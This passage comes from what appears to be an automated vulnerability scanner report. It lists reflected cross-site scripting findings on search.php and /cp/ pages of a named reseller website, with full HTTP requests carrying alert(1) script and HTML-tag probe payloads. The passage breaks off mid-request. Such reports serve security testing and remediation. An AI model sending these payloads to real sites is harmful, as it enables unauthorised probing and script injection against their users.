GET /communication/themes/kosmos/images/search.php?keyword=search...c0d06<a>c1501ebd4b2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...c0d06<a>c1501ebd4b2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.787. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21c75<script>alert(1)</script>ab4fd050b7f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&21c75<script>alert(1)</script>ab4fd050b7f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&21c75<script>alert(1)</script>ab4fd050b7f=1 was not found on this server.</p>
...[SNIP]...

2.788. http://www.resellerbase.com/communication/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 79cc8<a>2b7b9108c0e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=279cc8<a>2b7b9108c0e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=279cc8<a>2b7b9108c0e was not found on this server.</p>
...[SNIP]...

2.789. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 390c5<script>alert(1)</script>b6a62062968 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication390c5<script>alert(1)</script>b6a62062968/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication390c5<script>alert(1)</script>b6a62062968/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.790. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9c88<script>alert(1)</script>f195a30ed0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesf9c88<script>alert(1)</script>f195a30ed0b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesf9c88<script>alert(1)</script>f195a30ed0b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.791. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 29aec<script>alert(1)</script>b69e479e0d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos29aec<script>alert(1)</script>b69e479e0d2/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos29aec<script>alert(1)</script>b69e479e0d2/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.792. http://www.resellerbase.com/communication/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9ed3<script>alert(1)</script>87198f380ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/search.phpc9ed3<script>alert(1)</script>87198f380ff?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.phpc9ed3<script>alert(1)</script>87198f380ff?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.793. http://www.resellerbase.com/communication/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload a6dfa<a>735c9128d51 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Searcha6dfa<a>735c9128d51&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...&Submit3=Searcha6dfa<a>735c9128d51&opt=2 was not found on this server.</p>
...[SNIP]...

2.794. http://www.resellerbase.com/communication/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7fb49<a>ee8ec6146a2 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/search.php?keyword=search...7fb49<a>ee8ec6146a2&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...7fb49<a>ee8ec6146a2&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.795. http://www.resellerbase.com/communication/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d079<script>alert(1)</script>0ab1bc85617 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3d079<script>alert(1)</script>0ab1bc85617=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&3d079<script>alert(1)</script>0ab1bc85617=1 was not found on this server.</p>
...[SNIP]...

2.796. http://www.resellerbase.com/communication/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 10879<a>d37836de5ba was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210879<a>d37836de5ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=210879<a>d37836de5ba was not found on this server.</p>
...[SNIP]...

2.797. http://www.resellerbase.com/communication/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8724<script>alert(1)</script>b7cb92f9694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione8724<script>alert(1)</script>b7cb92f9694/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione8724<script>alert(1)</script>b7cb92f9694/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.798. http://www.resellerbase.com/communication/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df42c<script>alert(1)</script>45cf54a5286 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themesdf42c<script>alert(1)</script>45cf54a5286/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themesdf42c<script>alert(1)</script>45cf54a5286/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.799. http://www.resellerbase.com/communication/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 925a6<script>alert(1)</script>067d52094bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/search.php925a6<script>alert(1)</script>067d52094bb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php925a6<script>alert(1)</script>067d52094bb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.800. http://www.resellerbase.com/communication/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2e8d3<a>6680b37f4f3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search2e8d3<a>6680b37f4f3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...&Submit3=Search2e8d3<a>6680b37f4f3&opt=2 was not found on this server.</p>
...[SNIP]...

2.801. http://www.resellerbase.com/communication/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a5060<a>fad6e823213 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/search.php?keyword=search...a5060<a>fad6e823213&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...a5060<a>fad6e823213&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.802. http://www.resellerbase.com/communication/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 50b08<script>alert(1)</script>a26205c8ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2&50b08<script>alert(1)</script>a26205c8ccc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2&50b08<script>alert(1)</script>a26205c8ccc=1 was not found on this server.</p>
...[SNIP]...

2.803. http://www.resellerbase.com/communication/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eb852<a>01da5f14604 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2eb852<a>01da5f14604 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2eb852<a>01da5f14604 was not found on this server.</p>
...[SNIP]...

2.804. http://www.resellerbase.com/cp/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/cp/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddd67<script>alert(1)</script>90f36a48d0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cpddd67<script>alert(1)</script>90f36a48d0b/ HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
